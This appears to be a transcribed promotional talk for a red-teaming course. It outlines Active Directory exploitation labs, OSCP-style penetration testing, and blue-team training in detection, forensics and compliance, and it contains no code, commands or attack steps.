Okay, so simple, here you will see a lot of topics from beginner to intermediate level. Okay, we did always remember, we won't say advanced. Okay, advanced is a huge, okay, we only say intermediate here. Okay, this is the thing. After learning this all stuffs as well, you will become a intermediate level. Okay, this is the thing. We never say that you will become advanced. Okay, because till now I am learning. Okay, this is the thing. There is a no end here. If you want to become advanced, then you need to learn. That's it. Okay, this is a thing which you always need to remember in offensive side. Okay, mostly I work at offensive side, so that's why I know this thing. See, every day I learn. That's it. There is no free time. Okay, you need to learn, continuously learn. Okay, that's it. So this section, this training will give you a complete knowledge. Okay, you will become an intermediate level and you will become that much capable to do the research and to make yourself to advanced level. Okay, this is the thing, right? So from here you will see the master in active directory. Okay, then updates. Now this is a thing which is related to this one. So just ignore this point here. Okay, complete hands-on real world red teaming and penetration testing. Here you will see this is related to, we focus mostly on OSCP pattern in this section. So here we gonna solve the labs. Okay, you will get a complete idea. Assume that if you got a IP, okay, how to detect that it's running Active Directory or not, okay, how to enter in that IP address, how to find the vulnerabilities. Here you will learn each and everything. So see, this section will very useful for you, okay. See, if you didn't watch this previous section, then you won't get it, okay. So first of all, you need to we added in that way, like a step by step, okay. After completing one section, you need to go to another one. If you jump directly in one section, then you won't get anything. So the thing is, it's a roadmap for you, okay. That's it. As I told you, this is a complete successful roadmap to become a red teamer, right? So then here you will learn a real world steps, okay. You will become a capable to write a report to find the vulnerabilities, each and everything, okay. Then we will move to what a blue team training for red teamers. Here this is a one of the important training, because if you don't know how the blue teamer is detecting your attacks, then you are not a good red teamer here, okay. So that's why what we did means in this updates we are adding blue teaming training as well, which is SOC analysis level 1. Now here you will see how we can able to detect the attacks, okay, by using Splunk, okay. And you will learn endpoint detection and response, digital forensics and incident response, threat intelligence, malware analysis, phishing analysis, log analysis, vulnerability scanning and security compliance. Here you will learn ISO 27001 and HIPAA and PCI DSS, okay. Here we are covering these things. Still we are updating these topics because first of all we need to cover this one. Basically see, it's one video, okay. This assume that this is a one video. It will be around one more than hour, okay. The duration of one video is more than, sometimes it might be 2 hours, sometimes it might be 1.3 hours, something like that. It's not a 15 minutes training videos or something like that. Here you will, in one video we'll see a complete approach. This is the thing, right? So that's why we are adding a lot. We are also adding those labs which are very hard. Mostly here we added the hard labs only, how to approach this one, because if you go with easy, anyone can able to solve those things, okay. So mostly what we are doing, we are going with the hard labs, so you will get a complete idea about the real world. In real world the things will hard and easy as well, okay. But you need to prepare for both, okay. You everyone know about the easy steps, okay. Now you need to learn some more hard things. Here you will learn the approach and the way of thinking to exploit the these things, okay, the black box mostly, okay. Mostly here in this section you will see Active Directory, okay. Like in maybe in three videos we covered about the Windows, okay. But mostly you will see Active Directory, how to exploit the Active Directory, because as a red teamer I know mostly we get the Active Directory stuffs only, okay. Because if you compromise the Active Directory, what will happen, you compromise the entire company there, okay. This is the thing, entire block, something like that, right. So this training is complete dynamic. As I told you, we're gonna update it time to time, okay. There is a lot of sections are there still in pending, we need to add those as well. But let me tell you, you no need to worry about the updates, okay. The things, okay, the content which we added in the panel, it's enough to become an intermediate level red teamer. Like you will get each and everything, like how to perform the penetration testing, how to perform red teaming, this all stuffs. But still we are updating it, okay. This is the thing, so you no need to worry about these things, about the updations. Time to time we gonna update it, okay. There is a lot of things you need to learn. Once you join the training, there is a lot of things you will see, a lot of new things here, okay. Assume that if you are a basic ethical hacker or something like that, here you will see a lot of new things and new tools as well, right. Hope you guys enjoy this training. Thank you, have a nice day.